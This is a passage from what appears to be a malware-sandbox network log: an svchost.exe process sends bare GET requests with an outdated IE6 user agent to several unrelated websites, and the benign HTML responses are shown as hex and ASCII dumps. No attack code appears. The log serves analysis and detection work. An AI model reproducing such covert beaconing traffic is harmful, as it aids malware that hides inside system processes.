                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7104INData Raw: 20 30 20 31 20 31 36 20 34 27 2f 25 33 45 20 20 20 25 33 43 70 61 74 68 20 64 3d 27 4d 31 36 20 30 20 41 31 36 20 31 36 20 30 20 30 20 31 20 33 32 20 31 36 20 4c 32 38 20 31 36 20 41 31 32 20 31 32 20 30 20 30 20 30 20 31 36 20 34 7a 27 25 33 45 20 20 20 20 20 25 33 43 61 6e 69 6d 61 74 65 54 72 61 6e 73 66 6f 72 6d 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 27 74 72 61 6e 73 66 6f 72 6d 27 20 74 79 70 65 3d 27 72 6f 74 61 74 65 27 20 66 72 6f 6d 3d 27 30 20 31 36 20 31 36 27 20 74 6f 3d 27 33 36 30 20 31 36 20 31 36 27 20 64 75 72 3d 27 30 2e 38 73 27 20 72 65 70 65 61 74 43 6f 75 6e 74 3d 27 69 6e 64 65 66 69 6e 69 74 65 27 20 2f 25 33 45 20 20 20 25 33 43 2f 70 61 74 68 25 33 45 20 25 33 43 2f 73 76 67 25 33 45 22 29 3b 0a 7d 0a 2e 68 6f 75 72 67 6c
                                                                                                                                                                                                                                                                          Data Ascii: 0 1 16 4'/%3E %3Cpath d='M16 0 A16 16 0 0 1 32 16 L28 16 A12 12 0 0 0 16 4z'%3E %3CanimateTransform attributeName='transform' type='rotate' from='0 16 16' to='360 16 16' dur='0.8s' repeatCount='indefinite' /%3E %3C/path%3E %3C/svg%3E");}.hourgl
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7112INData Raw: 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 6b 62 73 5f 73 63 72 69 70 74 73 3d 7b 22 61 6a 61 78 5f 6c 6f 61 64 65 72 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 5c 2f 77 70 2d 63 6f 6e 74 65 6e 74 5c 2f 70 6c 75 67 69 6e 73 5c 2f 6b 62 2d 73 75 70 70 6f 72 74 5c 2f 61 73 73 65 74 73 5c 2f 69 6d 61 67 65 73 5c 2f 6c 6f 61 64 69 6e 67 2e 67 69 66 22 2c 22 61 6a 61 78 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61 64 6d 69 6e 2d 61 6a 61 78 2e 70 68 70 22 2c 22 68 6f 6e 65 79 70 6f 74 5f 66 61 69 6c 22 3a 22 48 6f 6e 65 79 70 6f 74 20 76 61 6c 69 64 61 74 69 6f 6e
                                                                                                                                                                                                                                                                          Data Ascii: type='text/javascript'>//<![CDATA[var kbs_scripts={"ajax_loader":"https:\/\/dataform.co.uk\/wp-content\/plugins\/kb-support\/assets\/images\/loading.gif","ajaxurl":"https:\/\/dataform.co.uk\/wp-admin\/admin-ajax.php","honeypot_fail":"Honeypot validation
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7120INData Raw: 65 3d 22 73 75 62 6d 69 74 22 5d 2c 2e 6d 75 5f 72 65 67 69 73 74 65 72 20 23 62 6c 6f 67 5f 74 69 74 6c 65 2c 2e 6d 75 5f 72 65 67 69 73 74 65 72 20 23 75 73 65 72 5f 65 6d 61 69 6c 2c 2e 6d 75 5f 72 65 67 69 73 74 65 72 20 23 62 6c 6f 67 6e 61 6d 65 2c 2e 6d 75 5f 72 65 67 69 73 74 65 72 20 23 75 73 65 72 5f 6e 61 6d 65 7b 77 69 64 74 68 3a 31 30 30 25 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 6d 61 72 67 69 6e 3a 35 70 78 20 30 7d 2e 6d 75 5f 72 65 67 69 73 74 65 72 20 23 73 69 74 65 2d 6c 61 6e 67 75 61 67 65 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 6d 75 5f 72 65 67 69 73 74 65 72 20 2e 70 72 65 66 69 78 5f 61 64 64 72 65 73 73 2c 2e 6d 75 5f 72 65 67 69 73 74 65 72 20 2e 73 75 66 66 69 78 5f 61 64 64 72 65 73 73 7b 66 6f 6e 74 2d 73 69
                                                                                                                                                                                                                                                                          Data Ascii: e="submit"],.mu_register #blog_title,.mu_register #user_email,.mu_register #blogname,.mu_register #user_name{width:100%;font-size:24px;margin:5px 0}.mu_register #site-language{display:block}.mu_register .prefix_address,.mu_register .suffix_address{font-si
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7128INData Raw: 74 73 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 69 6e 69 2d 6c 6f 67 69 6e 20 73 68 6f 77 2d 6f 6e 2d 64 65 73 6b 74 6f 70 20 68 69 64 65 2d 6f 6e 2d 66 69 72 73 74 2d 73 77 69 74 63 68 20 68 69 64 65 2d 6f 6e 2d 73 65 63 6f 6e 64 2d 73 77 69 74 63 68 22 3e 3c 61 20 68 72 65 66 3d 22 2f 6d 79 2d 61 63 63 6f 75 6e 74 2f 6c 6f 67 69 6e 2f 22 20 63 6c 61 73 73 3d 22 73 75 62 6d 69 74 22 3e 4c 6f 67 69 6e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 61 72 65 61 20 73 68 6f 77 2d 6f 6e 2d 64 65 73 6b 74 6f 70 20 68 69 64 65 2d 6f 6e 2d 66 69 72 73 74 2d 73 77 69 74 63 68 20 68 69 64 65 2d 6f 6e 2d 73 65 63 6f 6e 64 2d 73 77 69 74 63 68 22 3e 3c 70 3e 3c 61 20 63 6c 61 73 73 3d 22 64 65 66 61 75 6c 74 2d 62 74 6e 2d 73 68
                                                                                                                                                                                                                                                                          Data Ascii: ts"><div class="mini-login show-on-desktop hide-on-first-switch hide-on-second-switch"><a href="/my-account/login/" class="submit">Login</a></div><div class="text-area show-on-desktop hide-on-first-switch hide-on-second-switch"><p><a class="default-btn-sh
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7136INData Raw: 6f 75 74 28 27 73 68 6f 77 74 69 6d 65 28 29 27 2c 31 30 30 30 30 29 3b 74 69 6d 65 72 52 75 6e 6e 69 6e 67 3d 74 72 75 65 3b 7d 0a 66 75 6e 63 74 69 6f 6e 20 73 74 61 72 74 63 6c 6f 63 6b 28 29 7b 73 74 6f 70 63 6c 6f 63 6b 28 29 3b 73 68 6f 77 74 69 6d 65 28 29 3b 7d 0a 76 61 72 20 74 69 6d 65 72 49 44 3d 6e 75 6c 6c 3b 76 61 72 20 74 69 6d 65 72 52 75 6e 6e 69 6e 67 3d 66 61 6c 73 65 3b 76 61 72 20 78 3d 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 6e 6f 77 3d 78 2e 67 65 74 54 69 6d 65 28 29 3b 76 61 72 20 67 6d 74 3d 31 36 38 38 35 33 37 32 36 39 2a 31 30 30 30 3b 76 61 72 20 64 69 66 66 6d 73 3d 28 6e 6f 77 2d 67 6d 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73
                                                                                                                                                                                                                                                                          Data Ascii: out('showtime()',10000);timerRunning=true;}function startclock(){stopclock();showtime();}var timerID=null;var timerRunning=false;var x=new Date();var now=x.getTime();var gmt=1688537269*1000;var diffms=(now-gmt);</script><script type="text/javas


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          67192.168.2.65374185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6364OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: techtrans.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6364INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:47 GMT
                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                          Expires: 0
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6365INData Raw: 32 63 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                                                                                                                          Data Ascii: 2c2<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          68192.168.2.653715.189.171.125443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6364OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: www.muhr-soehne.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6365INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:47 GMT
                                                                                                                                                                                                                                                                          Server: Apache/2.4.38 (Debian)
                                                                                                                                                                                                                                                                          Last-Modified: Fri, 30 Jun 2023 05:41:10 GMT
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Content-Length: 53069
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6366INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6382INData Raw: 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65 73 73 74 65 63 68 6e 69 6b 2f 76 65 72 73 63 68 6c 69 65 73 73 6d 61 73 63 68 69 6e 65 6e 22 20 74 69 74 6c 65 3d 22 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                          Data Ascii: item layout-0 "> <a href="/verschliesstechnik/verschliessmaschinen" title="Verschliemaschinen"> Verschliemaschinen </a>
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6398INData Raw: 72 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 37 70 78 29 20 61 6e 64 20 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 6c 61 6e 64 73 63 61 70 65 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 75 73 65 72 5f 75 70 6c 6f 61 64 2f 4e 61 63 68 68 61 6c 74 69 67 6b 65 69 74 2f 63 73 6d 5f 6d 65 74 61 6c 5f 72 65 63 79 63 6c 65 73 5f 66 6f 72 65 76 65 72 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 39 31 70 78 29 20 61 6e 64 20 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 70 6f 72 74 72 61 69 74 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65
                                                                                                                                                                                                                                                                          Data Ascii: r.jpg"><source media="(max-width: 767px) and (orientation:landscape)" srcset="/fileadmin/user_upload/Nachhaltigkeit/csm_metal_recycles_forever.jpg"><source media="(max-width: 991px) and (orientation:portrait)" srcset="/file
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6414INData Raw: 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 5f 70 72 6f 63 65 73 73 65 64 5f 2f 65 2f 63 2f 63 73 6d 5f 65 66 72 65 2d 65 75 5f 34 38 30 5f 30 32 62 64 33 65 31 34 64 39 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 39 31 70 78 29 20 61 6e 64 20 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 70 6f 72 74 72 61 69 74 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 5f 70 72 6f 63 65 73 73 65 64 5f 2f 65 2f 63 2f 63 73 6d 5f 65 66 72 65 2d 65 75 5f 34 38 30 5f 30 32 62 64 33 65 31 34 64 39 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 39 31 70 78 29 20 61 6e 64
                                                                                                                                                                                                                                                                          Data Ascii: srcset="/fileadmin/_processed_/e/c/csm_efre-eu_480_02bd3e14d9.jpg"><source media="(max-width: 991px) and (orientation:portrait)" srcset="/fileadmin/_processed_/e/c/csm_efre-eu_480_02bd3e14d9.jpg"><source media="(max-width: 991px) and


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          69192.168.2.65486185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6417OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: techtrans.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6418INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:47 GMT
                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                          Expires: 0
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6418INData Raw: 32 63 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                                                                                                                          Data Ascii: 2c2<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          7192.168.2.65019935.214.171.193443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:07 UTC91OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: flamingorecordings.com
                                                                                                                                                                                                                                                                          2023-07-05 06:07:07 UTC91INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:07 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 75193
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          ETag: "6459edff-125b9"
                                                                                                                                                                                                                                                                          Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                                                                                                                                                                          X-Proxy-Cache-Info: DT:1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:07 UTC91INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 6d 61 78 2d 61 67 65 3d 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="cache-control" content="no-store,max-age=0" /> <meta name="robots" content="noindex"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:07 UTC107INData Raw: 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 35 39 2e 30 33 31 20 31 39 35 2e 32 36 38 20 36 31 2e 31 34 34 20 31 39 37 2e 31 31 20 36 33 2e 32 35 38 20 31 39 38 2e 39 34 38 20 36 31 2e 31 34 34 20 31 39 37 2e 31 31 20 35 39 2e 30 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 34 37 2e 32 32 35 20 31 39 35 2e 32 36 38 20 34 39 2e 33 33 38 20 31 39 37 2e 31 31 20 35 31 2e 34 35 32 20 31 39 38 2e 39 34 38 20 34 39 2e 33 33 38 20 31 39 37 2e 31 31 20 34 37 2e 32 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 33 35 2e 34 31 39 20 31 39 35 2e
                                                                                                                                                                                                                                                                          Data Ascii: fill="#fff"/><polygon points="197.11 59.031 195.268 61.144 197.11 63.258 198.948 61.144 197.11 59.031" fill="#fff"/><polygon points="197.11 47.225 195.268 49.338 197.11 51.452 198.948 49.338 197.11 47.225" fill="#fff"/><polygon points="197.11 35.419 195.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:07 UTC123INData Raw: 20 31 31 33 2e 31 35 34 20 36 31 2e 31 34 34 20 31 31 34 2e 39 39 36 20 36 33 2e 32 35 38 20 31 31 36 2e 38 33 34 20 36 31 2e 31 34 34 20 31 31 34 2e 39 39 36 20 35 39 2e 30 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 31 34 2e 39 39 36 20 34 37 2e 32 32 35 20 31 31 33 2e 31 35 34 20 34 39 2e 33 33 38 20 31 31 34 2e 39 39 36 20 35 31 2e 34 35 32 20 31 31 36 2e 38 33 34 20 34 39 2e 33 33 38 20 31 31 34 2e 39 39 36 20 34 37 2e 32 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 31 34 2e 39 39 36 20 33 35 2e 34 31 39 20 31 31 33 2e 31 35 34 20 33 37 2e 35 33 32 20 31 31 34 2e 39 39 36 20 33 39 2e 36 34 36 20 31 31 36 2e 38 33 34 20 33 37 2e 35
                                                                                                                                                                                                                                                                          Data Ascii: 113.154 61.144 114.996 63.258 116.834 61.144 114.996 59.031" fill="#fff"/><polygon points="114.996 47.225 113.154 49.338 114.996 51.452 116.834 49.338 114.996 47.225" fill="#fff"/><polygon points="114.996 35.419 113.154 37.532 114.996 39.646 116.834 37.5
                                                                                                                                                                                                                                                                          2023-07-05 06:07:07 UTC139INData Raw: 34 2e 39 32 31 20 32 34 30 2e 30 34 32 20 31 34 32 2e 38 30 38 20 32 33 38 2e 32 30 33 20 31 34 30 2e 36 39 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 32 34 36 2e 36 33 38 20 32 32 35 2e 34 35 31 20 32 34 38 2e 34 37 38 20 32 32 37 2e 35 36 35 20 32 35 30 2e 33 31 36 20 32 32 35 2e 34 35 31 20 32 34 38 2e 34 37 38 20 32 32 33 2e 33 33 37 20 32 34 36 2e 36 33 38 20 32 32 35 2e 34 35 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 32 34 38 2e 34 37 38 20 32 31 35 2e 37 35 39 20 32 35 30 2e 33 31 36 20 32 31 33 2e 36 34 35 20 32 34 38 2e 34 37 38 20 32 31 31 2e 35 33 31 20 32 34 36 2e 36 33 36 20 32 31 33 2e 36 34 35 20 32 34 38 2e 34 37 38 20 32 31 35
                                                                                                                                                                                                                                                                          Data Ascii: 4.921 240.042 142.808 238.203 140.694" fill="#fff"/><polygon points="246.638 225.451 248.478 227.565 250.316 225.451 248.478 223.337 246.638 225.451" fill="#fff"/><polygon points="248.478 215.759 250.316 213.645 248.478 211.531 246.636 213.645 248.478 215
                                                                                                                                                                                                                                                                          2023-07-05 06:07:07 UTC155INData Raw: 38 20 39 34 2e 34 34 38 20 32 30 33 2e 39 35 32 20 39 36 2e 32 38 36 20 32 30 31 2e 38 33 38 20 39 34 2e 34 34 38 20 31 39 39 2e 37 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 39 34 2e 34 34 38 20 31 38 37 2e 39 31 39 20 39 32 2e 36 31 20 31 39 30 2e 30 33 32 20 39 34 2e 34 34 38 20 31 39 32 2e 31 34 36 20 39 36 2e 32 38 36 20 31 39 30 2e 30 33 32 20 39 34 2e 34 34 38 20 31 38 37 2e 39 31 39 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 39 34 2e 34 34 38 20 31 37 36 2e 31 31 33 20 39 32 2e 36 31 20 31 37 38 2e 32 32 36 20 39 34 2e 34 34 38 20 31 38 30 2e 33 34 20 39 36 2e 32 38 36 20 31 37 38 2e 32 32 36 20 39 34 2e 34 34 38 20 31 37 36 2e 31 31 33
